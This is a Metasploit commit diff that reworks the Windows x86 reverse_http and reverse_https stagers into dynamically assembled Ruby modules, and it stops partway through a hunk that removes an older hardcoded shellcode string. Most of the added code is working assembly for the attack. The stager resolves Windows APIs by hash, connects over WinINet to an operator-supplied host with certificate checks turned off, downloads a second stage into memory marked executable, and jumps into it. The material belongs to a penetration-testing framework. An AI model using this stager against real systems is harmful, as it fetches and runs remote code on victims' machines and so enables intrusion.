Land #4904, @hmoore-r7 reworks reverse_http/s stagers
They are now assembled dynamically and support more flexible options, such as long URLs.bug/bundler_fix
commit
ceeee4446f
|
@ -76,8 +76,11 @@ module Msf
|
||||||
# Create a URI that matches a given checksum
|
# Create a URI that matches a given checksum
|
||||||
#
|
#
|
||||||
# @param sum [Fixnum] The checksum value you are trying to create a URI for
|
# @param sum [Fixnum] The checksum value you are trying to create a URI for
|
||||||
|
# @param len [Fixnum] An optional length value for the created URI
|
||||||
# @return [String] The URI string that checksums to the given value
|
# @return [String] The URI string that checksums to the given value
|
||||||
def generate_uri_checksum(sum)
|
def generate_uri_checksum(sum,len=nil)
|
||||||
|
return generate_uri_checksum_with_length(sum, len) if len
|
||||||
|
|
||||||
chk = ("a".."z").to_a + ("A".."Z").to_a + ("0".."9").to_a
|
chk = ("a".."z").to_a + ("A".."Z").to_a + ("0".."9").to_a
|
||||||
32.times do
|
32.times do
|
||||||
uri = Rex::Text.rand_text_alphanumeric(3)
|
uri = Rex::Text.rand_text_alphanumeric(3)
|
||||||
|
@ -90,6 +93,35 @@ module Msf
|
||||||
return URI_CHECKSUM_PRECALC[sum]
|
return URI_CHECKSUM_PRECALC[sum]
|
||||||
end
|
end
|
||||||
|
|
||||||
|
# Create an arbitrary length URI that matches a given checksum
|
||||||
|
#
|
||||||
|
# @param sum [Fixnum] The checksum value you are trying to create a URI for
|
||||||
|
# @param len [Fixnum] The length of the created URI
|
||||||
|
# @return [String] The URI string that checksums to the given value
|
||||||
|
def generate_uri_checksum_with_length(sum, len)
|
||||||
|
# Lengths shorter than 4 bytes are unable to match all possible checksums
|
||||||
|
# Lengths of exactly 4 are relatively slow to find for high checksum values
|
||||||
|
# Lengths of 5 or more bytes find a matching checksum fairly quickly (~80ms)
|
||||||
|
raise ArgumentError, "Length must be 5 bytes or greater" if len < 5
|
||||||
|
|
||||||
|
# Funny enough, this was more efficient than calculating checksum offsets
|
||||||
|
if len < 40
|
||||||
|
loop do
|
||||||
|
uri = Rex::Text.rand_text_alphanumeric(len)
|
||||||
|
return uri if Rex::Text.checksum8(uri) == sum
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
# The rand_text_alphanumeric() method becomes a bottleneck at around 40 bytes
|
||||||
|
# Calculating a static prefix flattens out the average runtime for longer URIs
|
||||||
|
prefix = Rex::Text.rand_text_alphanumeric(len-20)
|
||||||
|
|
||||||
|
loop do
|
||||||
|
uri = prefix + Rex::Text.rand_text_alphanumeric(20)
|
||||||
|
return uri if Rex::Text.checksum8(uri) == sum
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
|
@ -150,5 +150,12 @@ module Msf::Payload::Windows
|
||||||
return true
|
return true
|
||||||
end
|
end
|
||||||
|
|
||||||
|
#
|
||||||
|
# Share the EXITFUNC mappings with other classes
|
||||||
|
#
|
||||||
|
def self.exit_types
|
||||||
|
@@exit_types.dup
|
||||||
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
|
@ -0,0 +1,112 @@
|
||||||
|
# -*- coding: binary -*-
|
||||||
|
|
||||||
|
require 'msf/core'
|
||||||
|
|
||||||
|
module Msf
|
||||||
|
|
||||||
|
|
||||||
|
###
|
||||||
|
#
|
||||||
|
# Basic block_api stubs for Windows ARCH_X86 payloads
|
||||||
|
#
|
||||||
|
###
|
||||||
|
|
||||||
|
|
||||||
|
module Payload::Windows::BlockApi
|
||||||
|
|
||||||
|
def asm_block_api(opts={})
|
||||||
|
|
||||||
|
raw = %q^
|
||||||
|
|
||||||
|
api_call:
|
||||||
|
pushad ; We preserve all the registers for the caller, bar EAX and ECX.
|
||||||
|
mov ebp, esp ; Create a new stack frame
|
||||||
|
xor eax, eax ; Zero EAX (upper 3 bytes will remain zero until function is found)
|
||||||
|
mov edx, [fs:eax+48] ; Get a pointer to the PEB
|
||||||
|
mov edx, [edx+12] ; Get PEB->Ldr
|
||||||
|
mov edx, [edx+20] ; Get the first module from the InMemoryOrder module list
|
||||||
|
next_mod: ;
|
||||||
|
mov esi, [edx+40] ; Get pointer to modules name (unicode string)
|
||||||
|
movzx ecx, word [edx+38] ; Set ECX to the length we want to check
|
||||||
|
xor edi, edi ; Clear EDI which will store the hash of the module name
|
||||||
|
loop_modname: ;
|
||||||
|
lodsb ; Read in the next byte of the name
|
||||||
|
cmp al, 'a' ; Some versions of Windows use lower case module names
|
||||||
|
jl not_lowercase ;
|
||||||
|
sub al, 0x20 ; If so normalise to uppercase
|
||||||
|
not_lowercase: ;
|
||||||
|
ror edi, 13 ; Rotate right our hash value
|
||||||
|
add edi, eax ; Add the next byte of the name
|
||||||
|
loop loop_modname ; Loop untill we have read enough
|
||||||
|
|
||||||
|
; We now have the module hash computed
|
||||||
|
push edx ; Save the current position in the module list for later
|
||||||
|
push edi ; Save the current module hash for later
|
||||||
|
; Proceed to iterate the export address table
|
||||||
|
mov edx, [edx+16] ; Get this modules base address
|
||||||
|
mov ecx, [edx+60] ; Get PE header
|
||||||
|
|
||||||
|
; use ecx as our EAT pointer here so we can take advantage of jecxz.
|
||||||
|
mov ecx, [ecx+edx+120] ; Get the EAT from the PE header
|
||||||
|
jecxz get_next_mod1 ; If no EAT present, process the next module
|
||||||
|
add ecx, edx ; Add the modules base address
|
||||||
|
push ecx ; Save the current modules EAT
|
||||||
|
mov ebx, [ecx+32] ; Get the rva of the function names
|
||||||
|
add ebx, edx ; Add the modules base address
|
||||||
|
mov ecx, [ecx+24] ; Get the number of function names
|
||||||
|
; now ecx returns to its regularly scheduled counter duties
|
||||||
|
|
||||||
|
; Computing the module hash + function hash
|
||||||
|
get_next_func: ;
|
||||||
|
jecxz get_next_mod ; When we reach the start of the EAT (we search backwards), process the next module
|
||||||
|
dec ecx ; Decrement the function name counter
|
||||||
|
mov esi, [ebx+ecx*4] ; Get rva of next module name
|
||||||
|
add esi, edx ; Add the modules base address
|
||||||
|
xor edi, edi ; Clear EDI which will store the hash of the function name
|
||||||
|
; And compare it to the one we want
|
||||||
|
loop_funcname: ;
|
||||||
|
lodsb ; Read in the next byte of the ASCII function name
|
||||||
|
ror edi, 13 ; Rotate right our hash value
|
||||||
|
add edi, eax ; Add the next byte of the name
|
||||||
|
cmp al, ah ; Compare AL (the next byte from the name) to AH (null)
|
||||||
|
jne loop_funcname ; If we have not reached the null terminator, continue
|
||||||
|
add edi, [ebp-8] ; Add the current module hash to the function hash
|
||||||
|
cmp edi, [ebp+36] ; Compare the hash to the one we are searchnig for
|
||||||
|
jnz get_next_func ; Go compute the next function hash if we have not found it
|
||||||
|
|
||||||
|
; If found, fix up stack, call the function and then value else compute the next one...
|
||||||
|
pop eax ; Restore the current modules EAT
|
||||||
|
mov ebx, [eax+36] ; Get the ordinal table rva
|
||||||
|
add ebx, edx ; Add the modules base address
|
||||||
|
mov cx, [ebx+2*ecx] ; Get the desired functions ordinal
|
||||||
|
mov ebx, [eax+28] ; Get the function addresses table rva
|
||||||
|
add ebx, edx ; Add the modules base address
|
||||||
|
mov eax, [ebx+4*ecx] ; Get the desired functions RVA
|
||||||
|
add eax, edx ; Add the modules base address to get the functions actual VA
|
||||||
|
; We now fix up the stack and perform the call to the desired function...
|
||||||
|
finish:
|
||||||
|
mov [esp+36], eax ; Overwrite the old EAX value with the desired api address for the upcoming popad
|
||||||
|
pop ebx ; Clear off the current modules hash
|
||||||
|
pop ebx ; Clear off the current position in the module list
|
||||||
|
popad ; Restore all of the callers registers, bar EAX, ECX and EDX which are clobbered
|
||||||
|
pop ecx ; Pop off the origional return address our caller will have pushed
|
||||||
|
pop edx ; Pop off the hash value our caller will have pushed
|
||||||
|
push ecx ; Push back the correct return value
|
||||||
|
jmp eax ; Jump into the required function
|
||||||
|
; We now automagically return to the correct caller...
|
||||||
|
|
||||||
|
get_next_mod: ;
|
||||||
|
pop edi ; Pop off the current (now the previous) modules EAT
|
||||||
|
get_next_mod1: ;
|
||||||
|
pop edi ; Pop off the current (now the previous) modules hash
|
||||||
|
pop edx ; Restore our position in the module list
|
||||||
|
mov edx, [edx] ; Get the next module
|
||||||
|
jmp.i8 next_mod ; Process this module
|
||||||
|
^
|
||||||
|
end
|
||||||
|
|
||||||
|
|
||||||
|
end
|
||||||
|
|
||||||
|
end
|
||||||
|
|
|
@ -0,0 +1,79 @@
|
||||||
|
# -*- coding: binary -*-
|
||||||
|
|
||||||
|
require 'msf/core'
|
||||||
|
require 'msf/core/payload/windows'
|
||||||
|
module Msf
|
||||||
|
|
||||||
|
|
||||||
|
###
|
||||||
|
#
|
||||||
|
# Implements arbitrary exit routines for Windows ARCH_X86 payloads
|
||||||
|
#
|
||||||
|
###
|
||||||
|
|
||||||
|
module Payload::Windows::Exitfunk
|
||||||
|
|
||||||
|
def asm_exitfunk(opts={})
|
||||||
|
|
||||||
|
asm = "exitfunk:\n"
|
||||||
|
|
||||||
|
case opts[:exitfunk]
|
||||||
|
|
||||||
|
when 'seh'
|
||||||
|
asm << %Q^
|
||||||
|
mov ebx, #{"0x%.8x" % Msf::Payload::Windows.exit_types['seh']}
|
||||||
|
push.i8 0 ; push the exit function parameter
|
||||||
|
push ebx ; push the hash of the exit function
|
||||||
|
call ebp ; SetUnhandledExceptionFilter(0)
|
||||||
|
push.i8 0
|
||||||
|
ret ; Return to NULL (crash)
|
||||||
|
^
|
||||||
|
|
||||||
|
# On Windows Vista, Server 2008, and newer, it is not possible to call ExitThread
|
||||||
|
# on WoW64 processes, instead we need to call RtlExitUserThread. This stub will
|
||||||
|
# automatically generate the right code depending on the selected exit method.
|
||||||
|
|
||||||
|
when 'thread'
|
||||||
|
asm << %Q^
|
||||||
|
mov ebx, #{"0x%.8x" % Msf::Payload::Windows.exit_types['thread']}
|
||||||
|
push 0x9DBD95A6 ; hash( "kernel32.dll", "GetVersion" )
|
||||||
|
call ebp ; GetVersion(); (AL will = major version and AH will = minor version)
|
||||||
|
cmp al, 6 ; If we are not running on Windows Vista, 2008 or 7
|
||||||
|
jl exitfunk_goodbye ; Then just call the exit function...
|
||||||
|
cmp bl, 0xE0 ; If we are trying a call to kernel32.dll!ExitThread on Windows Vista, 2008 or 7...
|
||||||
|
jne exitfunk_goodbye ;
|
||||||
|
mov ebx, 0x6F721347 ; Then we substitute the EXITFUNK to that of ntdll.dll!RtlExitUserThread
|
||||||
|
exitfunk_goodbye: ; We now perform the actual call to the exit function
|
||||||
|
push.i8 0 ; push the exit function parameter
|
||||||
|
push ebx ; push the hash of the exit function
|
||||||
|
call ebp ; call ExitThread(0) || RtlExitUserThread(0)
|
||||||
|
^
|
||||||
|
|
||||||
|
when 'process', nil
|
||||||
|
asm << %Q^
|
||||||
|
mov ebx, #{"0x%.8x" % Msf::Payload::Windows.exit_types['process']}
|
||||||
|
push.i8 0 ; push the exit function parameter
|
||||||
|
push ebx ; push the hash of the exit function
|
||||||
|
call ebp ; ExitProcess(0)
|
||||||
|
^
|
||||||
|
|
||||||
|
when 'sleep'
|
||||||
|
asm << %Q^
|
||||||
|
mov ebx, #{"0x%.8x" % Rex::Text.ror13_hash('Sleep')}
|
||||||
|
push 300000 ; 300 seconds
|
||||||
|
push ebx ; push the hash of the function
|
||||||
|
call ebp ; Sleep(300000)
|
||||||
|
jmp exitfunk ; repeat
|
||||||
|
^
|
||||||
|
else
|
||||||
|
# Do nothing and continue after the end of the shellcode
|
||||||
|
end
|
||||||
|
|
||||||
|
asm
|
||||||
|
end
|
||||||
|
|
||||||
|
|
||||||
|
end
|
||||||
|
|
||||||
|
end
|
||||||
|
|
|
@ -0,0 +1,333 @@
|
||||||
|
# -*- coding: binary -*-
|
||||||
|
|
||||||
|
require 'msf/core'
|
||||||
|
require 'msf/core/payload/windows/block_api'
|
||||||
|
require 'msf/core/payload/windows/exitfunk'
|
||||||
|
|
||||||
|
module Msf
|
||||||
|
|
||||||
|
|
||||||
|
###
|
||||||
|
#
|
||||||
|
# Complex payload generation for Windows ARCH_X86 that speak HTTP(S)
|
||||||
|
#
|
||||||
|
###
|
||||||
|
|
||||||
|
|
||||||
|
module Payload::Windows::ReverseHttp
|
||||||
|
|
||||||
|
include Msf::Payload::Windows::BlockApi
|
||||||
|
include Msf::Payload::Windows::Exitfunk
|
||||||
|
|
||||||
|
#
|
||||||
|
# Register reverse_http specific options
|
||||||
|
#
|
||||||
|
def initialize(*args)
|
||||||
|
super
|
||||||
|
register_advanced_options(
|
||||||
|
[
|
||||||
|
OptInt.new('HTTPStagerURILength', [false, 'The URI length for the stager (at least 5 bytes)'])
|
||||||
|
], self.class)
|
||||||
|
end
|
||||||
|
|
||||||
|
#
|
||||||
|
# Generate the first stage
|
||||||
|
#
|
||||||
|
def generate
|
||||||
|
# Generate the simple version of this stager if we don't have enough space
|
||||||
|
if self.available_space.nil? || required_space > self.available_space
|
||||||
|
return generate_reverse_http(
|
||||||
|
ssl: false,
|
||||||
|
host: datastore['LHOST'],
|
||||||
|
port: datastore['LPORT'],
|
||||||
|
url: "/" + generate_uri_checksum(Msf::Handler::ReverseHttp::URI_CHECKSUM_INITW))
|
||||||
|
end
|
||||||
|
|
||||||
|
conf = {
|
||||||
|
ssl: false,
|
||||||
|
host: datastore['LHOST'],
|
||||||
|
port: datastore['LPORT'],
|
||||||
|
url: generate_uri,
|
||||||
|
exitfunk: datastore['EXITFUNC']
|
||||||
|
}
|
||||||
|
|
||||||
|
generate_reverse_http(conf)
|
||||||
|
end
|
||||||
|
|
||||||
|
#
|
||||||
|
# Generate and compile the stager
|
||||||
|
#
|
||||||
|
def generate_reverse_http(opts={})
|
||||||
|
combined_asm = %Q^
|
||||||
|
cld ; Clear the direction flag.
|
||||||
|
call start ; Call start, this pushes the address of 'api_call' onto the stack.
|
||||||
|
#{asm_block_api}
|
||||||
|
start:
|
||||||
|
pop ebp
|
||||||
|
#{asm_reverse_http(opts)}
|
||||||
|
^
|
||||||
|
Metasm::Shellcode.assemble(Metasm::X86.new, combined_asm).encode_string
|
||||||
|
end
|
||||||
|
|
||||||
|
#
|
||||||
|
# Generate the URI for the initial stager
|
||||||
|
#
|
||||||
|
def generate_uri
|
||||||
|
|
||||||
|
uri_req_len = datastore['HTTPStagerURILength'].to_i
|
||||||
|
|
||||||
|
# Choose a random URI length between 30 and 255 bytes
|
||||||
|
if uri_req_len == 0
|
||||||
|
uri_req_len = 30 + rand(256-30)
|
||||||
|
end
|
||||||
|
|
||||||
|
if uri_req_len < 5
|
||||||
|
raise ArgumentError, "Minimum HTTPStagerURILength is 5"
|
||||||
|
end
|
||||||
|
|
||||||
|
"/" + generate_uri_checksum(Msf::Handler::ReverseHttp::URI_CHECKSUM_INITW, uri_req_len)
|
||||||
|
end
|
||||||
|
|
||||||
|
#
|
||||||
|
# Determine the maximum amount of space required for the features requested
|
||||||
|
#
|
||||||
|
def required_space
|
||||||
|
# Start with our cached default generated size
|
||||||
|
space = cached_size
|
||||||
|
|
||||||
|
# Add 100 bytes for the encoder to have some room
|
||||||
|
space += 100
|
||||||
|
|
||||||
|
# Make room for the maximum possible URL length
|
||||||
|
space += 256
|
||||||
|
|
||||||
|
# EXITFUNK processing adds 31 bytes at most (for ExitThread, only ~16 for others)
|
||||||
|
space += 31
|
||||||
|
|
||||||
|
# The final estimated size
|
||||||
|
space
|
||||||
|
end
|
||||||
|
|
||||||
|
#
|
||||||
|
# Dynamic payload generation
|
||||||
|
#
|
||||||
|
def asm_reverse_http(opts={})
|
||||||
|
|
||||||
|
#
|
||||||
|
# options should contain:
|
||||||
|
# ssl: (true|false)
|
||||||
|
# url: "/url_to_request"
|
||||||
|
# host: [hostname]
|
||||||
|
# port: [port]
|
||||||
|
# exitfunk: [process|thread|seh|sleep]
|
||||||
|
#
|
||||||
|
|
||||||
|
http_open_flags = 0
|
||||||
|
|
||||||
|
if opts[:ssl]
|
||||||
|
#;0x80000000 | ; INTERNET_FLAG_RELOAD
|
||||||
|
#;0x04000000 | ; INTERNET_NO_CACHE_WRITE
|
||||||
|
#;0x00400000 | ; INTERNET_FLAG_KEEP_CONNECTION
|
||||||
|
#;0x00200000 | ; INTERNET_FLAG_NO_AUTO_REDIRECT
|
||||||
|
#;0x00000200 | ; INTERNET_FLAG_NO_UI
|
||||||
|
#;0x00800000 | ; INTERNET_FLAG_SECURE
|
||||||
|
#;0x00002000 | ; INTERNET_FLAG_IGNORE_CERT_DATE_INVALID
|
||||||
|
#;0x00001000 ; INTERNET_FLAG_IGNORE_CERT_CN_INVALID
|
||||||
|
http_open_flags = ( 0x80000000 | 0x04000000 | 0x00400000 | 0x00200000 | 0x00000200 | 0x00800000 | 0x00002000 | 0x00001000 )
|
||||||
|
else
|
||||||
|
#;0x80000000 | ; INTERNET_FLAG_RELOAD
|
||||||
|
#;0x04000000 | ; INTERNET_NO_CACHE_WRITE
|
||||||
|
#;0x00400000 | ; INTERNET_FLAG_KEEP_CONNECTION
|
||||||
|
#;0x00200000 | ; INTERNET_FLAG_NO_AUTO_REDIRECT
|
||||||
|
#;0x00000200 ; INTERNET_FLAG_NO_UI
|
||||||
|
http_open_flags = ( 0x80000000 | 0x04000000 | 0x00400000 | 0x00200000 | 0x00000200 )
|
||||||
|
end
|
||||||
|
|
||||||
|
asm = %Q^
|
||||||
|
;-----------------------------------------------------------------------------;
|
||||||
|
; Author: HD Moore
|
||||||
|
; Compatible: Confirmed Windows 7, Windows 2008 Server, Windows XP SP1, Windows SP3, Windows 2000
|
||||||
|
; Known Bugs: Incompatible with Windows NT 4.0, buggy on Windows XP Embedded (SP1)
|
||||||
|
; Version: 1.0
|
||||||
|
;-----------------------------------------------------------------------------;
|
||||||
|
|
||||||
|
; Input: EBP must be the address of 'api_call'.
|
||||||
|
; Output: EDI will be the socket for the connection to the server
|
||||||
|
; Clobbers: EAX, ESI, EDI, ESP will also be modified (-0x1A0)
|
||||||
|
load_wininet:
|
||||||
|
push 0x0074656e ; Push the bytes 'wininet',0 onto the stack.
|
||||||
|
push 0x696e6977 ; ...
|
||||||
|
push esp ; Push a pointer to the "wininet" string on the stack.
|
||||||
|
push 0x0726774C ; hash( "kernel32.dll", "LoadLibraryA" )
|
||||||
|
call ebp ; LoadLibraryA( "wininet" )
|
||||||
|
|
||||||
|
set_retry:
|
||||||
|
push.i8 8 ; retry 8 times should be enough
|
||||||
|
pop edi
|
||||||
|
xor ebx, ebx ; push 8 zeros ([1]-[8])
|
||||||
|
mov ecx, edi
|
||||||
|
push_zeros:
|
||||||
|
push ebx
|
||||||
|
loop push_zeros
|
||||||
|
|
||||||
|
internetopen:
|
||||||
|
; DWORD dwFlags [1]
|
||||||
|
; LPCTSTR lpszProxyBypass (NULL) [2]
|
||||||
|
; LPCTSTR lpszProxyName (NULL) [3]
|
||||||
|
; DWORD dwAccessType (PRECONFIG = 0) [4]
|
||||||
|
; LPCTSTR lpszAgent (NULL) [5]
|
||||||
|
push 0xA779563A ; hash( "wininet.dll", "InternetOpenA" )
|
||||||
|
call ebp
|
||||||
|
|
||||||
|
internetconnect:
|
||||||
|
; DWORD_PTR dwContext (NULL) [6]
|
||||||
|
; dwFlags [7]
|
||||||
|
push.i8 3 ; DWORD dwService (INTERNET_SERVICE_HTTP)
|
||||||
|
push ebx ; password (NULL)
|
||||||
|
push ebx ; username (NULL)
|
||||||
|
push #{opts[:port]} ; PORT
|
||||||
|
call got_server_uri ; double call to get pointer for both server_uri and
|
||||||
|
server_uri: ; server_host; server_uri is saved in EDI for later
|
||||||
|
db "#{opts[:url]}", 0x00
|
||||||
|
got_server_host:
|
||||||
|
push eax ; HINTERNET hInternet
|
||||||
|
push 0xC69F8957 ; hash( "wininet.dll", "InternetConnectA" )
|
||||||
|
call ebp
|
||||||
|
|
||||||
|
httpopenrequest:
|
||||||
|
; dwContext (NULL) [8]
|
||||||
|
push #{"0x%.8x" % http_open_flags} ; dwFlags
|
||||||
|
push ebx ; accept types
|
||||||
|
push ebx ; referrer
|
||||||
|
push ebx ; version
|
||||||
|
push edi ; server URI
|
||||||
|
push ebx ; method
|
||||||
|
push eax ; hConnection
|
||||||
|
push 0x3B2E55EB ; hash( "wininet.dll", "HttpOpenRequestA" )
|
||||||
|
call ebp
|
||||||
|
xchg esi, eax ; save hHttpRequest in esi
|
||||||
|
|
||||||
|
send_request:
|
||||||
|
^
|
||||||
|
|
||||||
|
if opts[:ssl]
|
||||||
|
asm << %Q^
|
||||||
|
; InternetSetOption (hReq, INTERNET_OPTION_SECURITY_FLAGS, &dwFlags, sizeof (dwFlags) );
|
||||||
|
set_security_options:
|
||||||
|
push 0x00003380
|
||||||
|
;0x00002000 | ; SECURITY_FLAG_IGNORE_CERT_DATE_INVALID
|
||||||
|
;0x00001000 | ; SECURITY_FLAG_IGNORE_CERT_CN_INVALID
|
||||||
|
;0x00000200 | ; SECURITY_FLAG_IGNORE_WRONG_USAGE
|
||||||
|
;0x00000100 | ; SECURITY_FLAG_IGNORE_UNKNOWN_CA
|
||||||
|
;0x00000080 ; SECURITY_FLAG_IGNORE_REVOCATION
|
||||||
|
mov eax, esp
|
||||||
|
push.i8 4 ; sizeof(dwFlags)
|
||||||
|
push eax ; &dwFlags
|
||||||
|
push.i8 31 ; DWORD dwOption (INTERNET_OPTION_SECURITY_FLAGS)
|
||||||
|
push esi ; hHttpRequest
|
||||||
|
push 0x869E4675 ; hash( "wininet.dll", "InternetSetOptionA" )
|
||||||
|
call ebp
|
||||||
|
^
|
||||||
|
end
|
||||||
|
|
||||||
|
asm << %Q^
|
||||||
|
httpsendrequest:
|
||||||
|
push ebx ; lpOptional length (0)
|
||||||
|
push ebx ; lpOptional (NULL)
|
||||||
|
push ebx ; dwHeadersLength (0)
|
||||||
|
push ebx ; lpszHeaders (NULL)
|
||||||
|
push esi ; hHttpRequest
|
||||||
|
push 0x7B18062D ; hash( "wininet.dll", "HttpSendRequestA" )
|
||||||
|
call ebp
|
||||||
|
test eax,eax
|
||||||
|
jnz allocate_memory
|
||||||
|
|
||||||
|
try_it_again:
|
||||||
|
dec edi
|
||||||
|
jnz send_request
|
||||||
|
|
||||||
|
; if we didn't allocate before running out of retries, bail out
|
||||||
|
^
|
||||||
|
|
||||||
|
if opts[:exitfunk]
|
||||||
|
asm << %Q^
|
||||||
|
failure:
|
||||||
|
call exitfunk
|
||||||
|
^
|
||||||
|
else
|
||||||
|
asm << %Q^
|
||||||
|
failure:
|
||||||
|
push 0x56A2B5F0 ; hardcoded to exitprocess for size
|
||||||
|
call ebp
|
||||||
|
^
|
||||||
|
end
|
||||||
|
|
||||||
|
asm << %Q^
|
||||||
|
allocate_memory:
|
||||||
|
push.i8 0x40 ; PAGE_EXECUTE_READWRITE
|
||||||
|
push 0x1000 ; MEM_COMMIT
|
||||||
|
push 0x00400000 ; Stage allocation (4Mb ought to do us)
|
||||||
|
push ebx ; NULL as we dont care where the allocation is
|
||||||
|
push 0xE553A458 ; hash( "kernel32.dll", "VirtualAlloc" )
|
||||||
|
call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
|
||||||
|
|
||||||
|
download_prep:
|
||||||
|
xchg eax, ebx ; place the allocated base address in ebx
|
||||||
|
push ebx ; store a copy of the stage base address on the stack
|
||||||
|
push ebx ; temporary storage for bytes read count
|
||||||
|
mov edi, esp ; &bytesRead
|
||||||
|
|
||||||
|
download_more:
|
||||||
|
push edi ; &bytesRead
|
||||||
|
push 8192 ; read length
|
||||||
|
push ebx ; buffer
|
||||||
|
push esi ; hRequest
|
||||||
|
push 0xE2899612 ; hash( "wininet.dll", "InternetReadFile" )
|
||||||
|
call ebp
|
||||||
|
|
||||||
|
test eax,eax ; download failed? (optional?)
|
||||||
|
jz failure
|
||||||
|
|
||||||
|
mov eax, [edi]
|
||||||
|
add ebx, eax ; buffer += bytes_received
|
||||||
|
|
||||||
|
test eax,eax ; optional?
|
||||||
|
jnz download_more ; continue until it returns 0
|
||||||
|
pop eax ; clear the temporary storage
|
||||||
|
|
||||||
|
execute_stage:
|
||||||
|
ret ; dive into the stored stage address
|
||||||
|
|
||||||
|
got_server_uri:
|
||||||
|
pop edi
|
||||||
|
call got_server_host
|
||||||
|
|
||||||
|
server_host:
|
||||||
|
db "#{opts[:host]}", 0x00
|
||||||
|
^
|
||||||
|
|
||||||
|
if opts[:exitfunk]
|
||||||
|
asm << asm_exitfunk(opts)
|
||||||
|
end
|
||||||
|
asm
|
||||||
|
end
|
||||||
|
|
||||||
|
#
|
||||||
|
# Do not transmit the stage over the connection. We handle this via HTTPS
|
||||||
|
#
|
||||||
|
def stage_over_connection?
|
||||||
|
false
|
||||||
|
end
|
||||||
|
|
||||||
|
#
|
||||||
|
# Always wait at least 20 seconds for this payload (due to staging delays)
|
||||||
|
#
|
||||||
|
def wfs_delay
|
||||||
|
20
|
||||||
|
end
|
||||||
|
|
||||||
|
|
||||||
|
end
|
||||||
|
|
||||||
|
end
|
||||||
|
|
|
@ -0,0 +1,63 @@
|
||||||
|
# -*- coding: binary -*-
|
||||||
|
|
||||||
|
require 'msf/core'
|
||||||
|
require 'msf/core/payload/windows/reverse_http'
|
||||||
|
|
||||||
|
module Msf
|
||||||
|
|
||||||
|
|
||||||
|
###
|
||||||
|
#
|
||||||
|
# Complex payload generation for Windows ARCH_X86 that speak HTTPS
|
||||||
|
#
|
||||||
|
###
|
||||||
|
|
||||||
|
|
||||||
|
module Payload::Windows::ReverseHttps
|
||||||
|
|
||||||
|
include Msf::Payload::Windows::ReverseHttp
|
||||||
|
|
||||||
|
#
|
||||||
|
# Generate and compile the stager
|
||||||
|
#
|
||||||
|
def generate_reverse_https(opts={})
|
||||||
|
combined_asm = %Q^
|
||||||
|
cld ; Clear the direction flag.
|
||||||
|
call start ; Call start, this pushes the address of 'api_call' onto the stack.
|
||||||
|
#{asm_block_api}
|
||||||
|
start:
|
||||||
|
pop ebp
|
||||||
|
#{asm_reverse_http(opts)}
|
||||||
|
^
|
||||||
|
Metasm::Shellcode.assemble(Metasm::X86.new, combined_asm).encode_string
|
||||||
|
end
|
||||||
|
|
||||||
|
#
|
||||||
|
# Generate the first stage
|
||||||
|
#
|
||||||
|
def generate
|
||||||
|
|
||||||
|
# Generate the simple version of this stager if we don't have enough space
|
||||||
|
if self.available_space.nil? || required_space > self.available_space
|
||||||
|
return generate_reverse_https(
|
||||||
|
host: datastore['LHOST'],
|
||||||
|
port: datastore['LPORT'],
|
||||||
|
url: "/" + generate_uri_checksum(Msf::Handler::ReverseHttp::URI_CHECKSUM_INITW),
|
||||||
|
ssl: true)
|
||||||
|
end
|
||||||
|
|
||||||
|
conf = {
|
||||||
|
ssl: true,
|
||||||
|
host: datastore['LHOST'],
|
||||||
|
port: datastore['LPORT'],
|
||||||
|
url: generate_uri,
|
||||||
|
exitfunk: datastore['EXITFUNC']
|
||||||
|
}
|
||||||
|
|
||||||
|
generate_reverse_https(conf)
|
||||||
|
end
|
||||||
|
|
||||||
|
end
|
||||||
|
|
||||||
|
end
|
||||||
|
|
|
@ -6,14 +6,15 @@
|
||||||
|
|
||||||
require 'msf/core'
|
require 'msf/core'
|
||||||
require 'msf/core/handler/reverse_http'
|
require 'msf/core/handler/reverse_http'
|
||||||
|
require 'msf/core/payload/windows/reverse_http'
|
||||||
|
|
||||||
module Metasploit3
|
module Metasploit3
|
||||||
|
|
||||||
CachedSize = 322
|
CachedSize = 306
|
||||||
|
|
||||||
include Msf::Payload::Stager
|
include Msf::Payload::Stager
|
||||||
include Msf::Payload::Windows
|
include Msf::Payload::Windows
|
||||||
|
include Msf::Payload::Windows::ReverseHttp
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
super(merge_info(info,
|
super(merge_info(info,
|
||||||
|
@ -24,68 +25,6 @@ module Metasploit3
|
||||||
'Platform' => 'win',
|
'Platform' => 'win',
|
||||||
'Arch' => ARCH_X86,
|
'Arch' => ARCH_X86,
|
||||||
'Handler' => Msf::Handler::ReverseHttp,
|
'Handler' => Msf::Handler::ReverseHttp,
|
||||||
'Convention' => 'sockedi http',
|
'Convention' => 'sockedi http'))
|
||||||
'Stager' =>
|
|
||||||
{
|
|
||||||
'Offsets' =>
|
|
||||||
{
|
|
||||||
# Disabled since it MUST be ExitProcess to work on WoW64 unless we add EXITFUNK support (too big right now)
|
|
||||||
# 'EXITFUNC' => [ 240, 'V' ],
|
|
||||||
'LPORT' => [ 177, 'v' ], # Not a typo, really little endian
|
|
||||||
},
|
|
||||||
'Payload' =>
|
|
||||||
"\xFC\xE8\x82\x00\x00\x00\x60\x89\xE5\x31\xC0\x64\x8B\x50\x30\x8B" +
|
|
||||||
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\xAC\x3C" +
|
|
||||||
"\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF2\x52\x57\x8B\x52" +
|
|
||||||
"\x10\x8B\x4A\x3C\x8B\x4C\x11\x78\xE3\x48\x01\xD1\x51\x8B\x59\x20" +
|
|
||||||
"\x01\xD3\x8B\x49\x18\xE3\x3A\x49\x8B\x34\x8B\x01\xD6\x31\xFF\xAC" +
|
|
||||||
"\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF6\x03\x7D\xF8\x3B\x7D\x24\x75" +
|
|
||||||
"\xE4\x58\x8B\x58\x24\x01\xD3\x66\x8B\x0C\x4B\x8B\x58\x1C\x01\xD3" +
|
|
||||||
"\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24\x5B\x5B\x61\x59\x5A\x51\xFF" +
|
|
||||||
"\xE0\x5F\x5F\x5A\x8B\x12\xEB\x8D\x5D\x68\x6E\x65\x74\x00\x68\x77" +
|
|
||||||
